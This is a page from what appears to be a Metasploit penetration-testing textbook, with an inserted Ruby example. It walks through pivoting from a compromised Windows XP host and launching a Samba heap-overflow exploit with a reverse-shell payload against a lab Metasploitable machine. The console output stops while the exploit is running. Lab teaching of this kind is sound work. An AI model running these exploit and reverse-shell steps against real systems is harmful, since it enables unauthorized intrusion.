90 Chapter 6

We have successfully compromised our Windows XP machine and have full access to it. Next, we background our running session and add a route command to the Framework, telling it to route the remote network ID over session 1, the backgrounded Meterpreter session. We then display the active routes with route print, and we can clearly see that, just as we desired, the route is active.
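To make the routing step concrete, here is an added example (not code from the book or from Metasploit itself) that models the table route add builds and the lookup the Framework performs when an exploit opens a connection: it shows why RHOST 192.168.33.132 is tunnelled through Meterpreter session 1 while LHOST 10.10.1.129 stays on the attacker's own interface. It goes slightly beyond the page by doing longest-prefix matching, so overlapping routes resolve to the most specific session; the PivotRouteTable class and its method names are this example's own.

```ruby
require 'ipaddr'

# Model of the msfconsole routing table that `route add <subnet> <netmask> <session>`
# builds (an illustration written for this page, not Metasploit's own code).
class PivotRouteTable
  Route = Struct.new(:network, :session)

  def initialize
    @routes = []
  end

  # Mirrors `route add 192.168.33.0 255.255.255.0 1`.
  # IPAddr accepts a dotted-quad netmask after the slash.
  def add(subnet, netmask, session)
    @routes << Route.new(IPAddr.new("#{subnet}/#{netmask}"), session)
    self
  end

  # Mirrors `route print`: one "subnet netmask Session N" line per entry.
  def print_routes
    @routes.map do |r|
      mask = IPAddr.new('255.255.255.255').mask(r.network.prefix).to_s
      format('%-16s %-16s Session %d', r.network.to_s, mask, r.session)
    end
  end

  # Longest-prefix match: returns the session id a connection to +dest+ is
  # tunnelled through, or nil when the Framework connects directly from its
  # own interface (the case for LHOST 10.10.1.129 on this page).
  def session_for(dest)
    ip = IPAddr.new(dest)
    best = @routes.select { |r| r.network.include?(ip) }
                  .max_by { |r| r.network.prefix }
    best&.session
  end
end

# The chapter's scenario: the 192.168.33.0/24 network ID is reachable only
# through the compromised Windows XP host that holds Meterpreter session 1.
def chapter_routes
  PivotRouteTable.new.add('192.168.33.0', '255.255.255.0', 1)
end

if __FILE__ == $PROGRAM_NAME
  table = chapter_routes
  puts table.print_routes
  puts "RHOST 192.168.33.132 -> session #{table.session_for('192.168.33.132').inspect}"
  puts "LHOST 10.10.1.129    -> session #{table.session_for('10.10.1.129').inspect}"
end
```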

Next, we'll set up a second exploit against the targeted Linux system. The specific exploit here is a Samba-based heap overflow to which our Metasploitable machine is vulnerable.

msf exploit(handler) > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(lsa_transnames_heap) > set LHOST 10.10.1.129
LHOST => 10.10.1.129
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.33.132
RHOST => 192.168.33.132
msf exploit(lsa_transnames_heap) > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:47:e6:79
          inet addr:10.10.1.129  Bcast:10.10.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe47:e679/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:23656 errors:0 dropped:0 overruns:0 frame:0
          TX packets:32321 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4272582 (4.2 MB)  TX bytes:17849775 (17.8 MB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:600 errors:0 dropped:0 overruns:0 frame:0
          TX packets:600 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:41386 (41.3 KB)  TX bytes:41386 (41.3 KB)

msf exploit(lsa_transnames_heap) > exploit
[*] Started reverse handler on 10.10.1.129:8080
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...